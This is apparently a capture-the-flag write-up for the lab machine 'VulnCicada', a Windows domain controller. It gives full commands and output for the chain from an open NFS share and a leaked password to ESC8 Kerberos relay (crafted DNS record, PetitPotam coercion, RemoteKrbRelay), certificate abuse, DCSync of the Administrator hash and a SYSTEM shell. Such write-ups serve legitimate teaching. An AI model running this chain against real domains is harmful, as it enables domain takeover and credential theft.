Introduction
VulnCicada is a Windows Domain Controller machine with a fun twist - the initial credential is hidden inside an image on a publicly accessible file share. Once you have valid creds, the machine is vulnerable to ESC8 (ADCS web enrollment over HTTP), but with a catch: NTLM auth is fully disabled, so normal relay attacks won’t work. The solution is Kerberos relaying - a more modern technique to bypass this restriction and get a certificate as the DC machine account, which then lets you dump the Administrator hash.
Two exploitation paths are covered:
- Method 1 (Linux) -
bloodyAD+certipy relay+nxc coerce_plus - Method 2 (Windows VM) - Join your Windows VM to the domain +
RemoteKrbRelay.exe
Key Concepts
What is NFS? Network File System - a way to share folders over a network, common on Linux but also supported on Windows. If it’s exposed publicly, anyone can mount and browse those folders without credentials.
What is ESC8? An ADCS (Active Directory Certificate Services) misconfiguration where the CA’s web enrollment interface (/certsrv/) is running over plain HTTP. If you can trick a machine into authenticating to you, you can relay that auth to this HTTP endpoint and get a certificate as that machine. Normally this is done with NTLM relay, but this box has NTLM disabled.
What is Kerberos Relaying? Just like NTLM relay but using Kerberos tickets. By injecting a special DNS record pointing back to your machine, you can make the DC think it’s authenticating to a legitimate service - and relay that Kerberos authentication to the ADCS web enrollment page to get a certificate.
What is a Machine Account Certificate? When you get a certificate for a machine account (e.g. DC-JPQ225$), you can use it to authenticate as that machine. Domain Controllers have DCSync privileges, meaning they can dump all password hashes from the domain - including Administrator.
What is coercion? Forcing a machine to authenticate to you by calling an API it’s listening on (like PetitPotam, PrintSpooler, etc.). The machine reaches out to your IP, and you intercept that authentication.
Enumeration
Nmap
ports=$(nmap -p- --min-rate=1000 -T4 <TARGET> | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV <TARGET>Key ports to notice:
| Port | Service | Notes |
|---|---|---|
| 53 | DNS | Domain Controller indicator |
| 80 | IIS | Default page only |
| 88 | Kerberos | DC indicator |
| 389/636 | LDAP | Domain: cicada.vl |
| 445 | SMB | Signing required, NTLM disabled |
| 2049 | NFS | Public file share - this is the entry point |
| 5985 | WinRM | Useful later |
Update your hosts file:
echo "<TARGET> DC-JPQ225.cicada.vl cicada.vl" | sudo tee -a /etc/hostsNFS: Find the public share
NFS is like a publicly accessible folder share. Check what’s available:
showmount -e cicada.vlOutput:
Export list for cicada.vl:
/profiles (everyone)(everyone) means no credentials needed. Mount it:
sudo mount -t nfs -o rw cicada.vl:/profiles /mnt
ls /mntOutput:
Administrator Daniel.Marshall Debra.Wright Jane.Carter Jordan.Francis
Joyce.Andrews Katie.Ward Megan.Simpson Richard.Gibbons Rosie.Powell Shirley.WestThis is the C:\Users directory of the DC - all user home folders are exposed. Browse with tree:
tree /mntMost folders are empty, but two image files stand out:
/mnt/Administrator/vacation.png/mnt/Rosie.Powell/marketing.png
Copy them to your machine and open them:
sudo cp /mnt/Administrator/vacation.png .
sudo cp /mnt/Rosie.Powell/marketing.png .vacation.png is a generic stock photo. marketing.png shows a person at a computer with a sticky note on the monitor that reads: Cicada123
That’s the password. Someone left their credentials in a photo that was stored on a world-readable share. This is a real-world mistake that happens more often than you’d think.
Validate the Credentials
Try the credentials with NetExec (nxc):
nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123Output: STATUS_NOT_SUPPORTED - NTLM is completely disabled on this DC.
You need to use Kerberos authentication instead. First sync your clock with the DC (Kerberos requires your time to be within 5 minutes of the target):
sudo ntpdate -u cicada.vlNow try again with -k (Kerberos):
nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -kOutput: [+] cicada.vl\Rosie.Powell:Cicada123 ✅
You now have: Rosie.Powell : Cicada123
Enumerate shares
nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k --sharesYou’ll spot a CertEnroll share - this is the ADCS web enrollment share. ADCS is installed on this DC.
Enumerate ADCS for Vulnerabilities
certipy find -target DC-JPQ225.cicada.vl \
-u Rosie.Powell@cicada.vl -p Cicada123 \
-k -vulnerable -stdoutKey output:
CA Name : cicada-DC-JPQ225-CA
Web Enrollment
HTTP : Enabled ← HTTP (not HTTPS) = vulnerable
HTTPS : Disabled
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled over HTTP.ESC8 explained: The CA’s web enrollment page (
http://dc-jpq225.cicada.vl/certsrv/) accepts HTTP. If a machine authenticates to this page, a certificate is issued. Normally you’d use NTLM relay to forward that authentication - but NTLM is disabled here. So we use Kerberos relay instead.
Exploitation: Method 1 (Linux / Kerberos Relay via SMB)
This method works entirely from your Linux attack machine.
How it works
The trick is a special DNS record - by adding a DNS entry for a fake hostname that resolves to your IP, you can make the DC send its Kerberos authentication to you (thinking it’s talking to another DC). You then relay that Kerberos ticket to the ADCS HTTP enrollment page.
Step 1: Add the magic DNS entry
The DNS record name is a specially crafted string. Replace <YOUR_IP> with your tun0 IP:
bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k \
--host DC-JPQ225.cicada.vl \
add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA <YOUR_IP>Output: [+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
Why this specific string? The long
AAAA...portion encodes special flags that tell Windows this hostname should be treated as a machine in the same domain, making the DC willing to use Kerberos to authenticate to it. This is the “magic” behind Kerberos relay over SMB.
Step 2: Start the Certipy relay listener
In a new terminal, start the relay. It listens on port 445 (SMB) and forwards received Kerberos tickets to the ADCS HTTP enrollment endpoint:
certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainControllerOutput:
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445Note: Make sure you’re using a recent version of certipy that includes the
relayoption. Install via:pip install certipy-ad
Step 3: Coerce the DC to authenticate to you
In a third terminal, use nxc’s coerce_plus module with the PetitPotam method to force the DC to reach out and authenticate to your fake DNS entry:
nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k \
-M coerce_plus \
-o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotamWhat is PetitPotam? A technique that calls a Windows API (
EfsRpcOpenFileRaw) which triggers the target machine to authenticate to a hostname you specify. Essentially it “coerces” the DC into reaching out to you.
Step 4: Catch the certificate
Back in your relay terminal, you’ll see:
[*] Authenticating against http://dc-jpq225.cicada.vl as / SUCCEED
[*] Requesting certificate for '\\' based on the template 'DomainController'
[*] Certificate issued with request ID 88
[*] Got certificate with DNS Host Name 'DC-JPQ225.cicada.vl'
[*] Saved certificate and private key to 'dc-jpq225.pfx'You now have dc-jpq225.pfx - a certificate for the DC machine account!
Step 5: Authenticate as the DC machine account
Use the certificate to get a Kerberos TGT and NTLM hash for DC-JPQ225$:
certipy auth -pfx dc-jpq225.pfx -dc-ip <TARGET>Output:
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Got hash for 'dc-jpq225$@cicada.vl':
aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3You have a .ccache file (Kerberos ticket) for the DC machine account.
Step 6: DCSync to get Administrator’s hash
The DC machine account has the right to replicate (sync) all domain credentials. Use secretsdump with the .ccache file to dump the Administrator hash:
KRB5CCNAME=dc-jpq225.ccache secretsdump.py \
-k -no-pass \
cicada.vl/dc-jpq225\$@dc-jpq225.cicada.vl \
-just-dc-user administrator
KRB5CCNAME=...tells Kerberos tools to use your saved ticket instead of asking for a password.
Output:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87:::Administrator NTLM hash: 85a0da53871a9d56b6cd05deda3a5e87
Step 7: Get a shell
Since NTLM is disabled, use -k with Kerberos auth + the hash:
impacket-psexec cicada.vl/administrator@DC-JPQ225.cicada.vl \
-k -hashes :85a0da53871a9d56b6cd05deda3a5e87C:\Windows\system32> whoami
nt authority\systemFlags are at:
C:\Users\Administrator\Desktop\user.txtC:\Users\Administrator\Desktop\root.txt
Exploitation: Method 2 (Windows VM / RemoteKrbRelay)
This is an alternative approach using a Windows VM joined to the domain. Useful if you prefer a Windows workflow or if Method 1 doesn’t work.
Step 1: Check the Machine Account Quota
Any domain user can join computers to the domain up to the Machine Account Quota limit. Check it:
nxc ldap DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M maqOutput: MachineAccountQuota: 10
This means any domain user can join up to 10 computers. So you can join your Windows VM to cicada.vl using Rosie.Powell’s credentials.
Step 2: Join your Windows VM to the domain
On your Windows VM:
- Set the DNS server to the DC’s IP (
<TARGET>) in your VPN adapter’s IPv4 settings - Make sure IPv6 is enabled on the adapter
- Go to System Properties → Computer Name → Change → select Domain → type
cicada.vl→ enterrosie.powell : Cicada123when prompted - Reboot when prompted - “Welcome to the cicada.vl domain”
Step 3: Run RemoteKrbRelay
Download and compile RemoteKrbRelay, then run:
.\RemoteKrbRelay.exe -adcs -template DomainController `
-victim dc-jpq225.cicada.vl `
-target dc-jpq225.cicada.vl `
-clsid d99e6e74-fc88-11d0-b498-00a0c90312f3What is a CLSID? A COM object ID. RemoteKrbRelay uses a COM object that runs as SYSTEM to force the DC to authenticate. The CLSID
d99e6e74-...points to a specific COM object that works for this coercion.
Output:
[+] Got Krb Auth from NT/System. Relaying to ADCS now...
[+] Received Kerberos Auth from dc-jpq225.cicada.vl
[+] HTTP session established
[+] Success (ReqID: 17)
[+] Certificate in PKCS12: MIACAQ<SNIP>Step 4: Convert and use the certificate
Back on Linux, decode the Base64 certificate:
echo "MIACA<SNIP>" | base64 -d > dc.pfxThen follow the exact same steps as Method 1 from Step 5 onwards (certipy auth → secretsdump → psexec).
Summary
NFS share (everyone) → mount /profiles → image files
↓
marketing.png → password on sticky note: Cicada123
↓
Rosie.Powell : Cicada123 (NTLM disabled - use -k for Kerberos)
↓
certipy find → ESC8: HTTP web enrollment enabled on cicada-DC-JPQ225-CA
↓
── Method 1 (Linux) ──────────────────────────────────────
bloodyAD → add magic DNS record pointing to attacker IP
certipy relay → listen on port 445, forward to ADCS HTTP
nxc coerce_plus PetitPotam → force DC to authenticate to DNS entry
↓
── Method 2 (Windows VM) ─────────────────────────────────
Join Windows VM to cicada.vl domain (MAQ=10, any user can join)
RemoteKrbRelay.exe → force SYSTEM to relay Kerberos to ADCS
↓
Both methods → dc-jpq225.pfx (certificate as DC machine account)
↓
certipy auth -pfx dc-jpq225.pfx → dc-jpq225.ccache + machine hash
↓
KRB5CCNAME=dc-jpq225.ccache secretsdump → Administrator hash: 85a0da5387...
↓
impacket-psexec -k -hashes → nt authority\system → flagsTools Used
| Tool | What it does | How to get it |
|---|---|---|
| nxc (NetExec) | Swiss army knife for AD enumeration/auth | pip install netexec |
| certipy-ad | ADCS enumeration and exploitation (relay, auth) | pip install certipy-ad |
| bloodyAD | Modify AD objects over LDAP/Kerberos | pip install bloodyAD |
| impacket-psexec | Remote shell via SMB | pip install impacket |
| secretsdump.py | Dumps domain hashes via DCSync | Part of impacket |
| RemoteKrbRelay | Kerberos relay from Windows (Method 2) | GitHub |
| ntpdate | Sync your clock with the DC (required for Kerberos) | sudo apt install ntpdate |
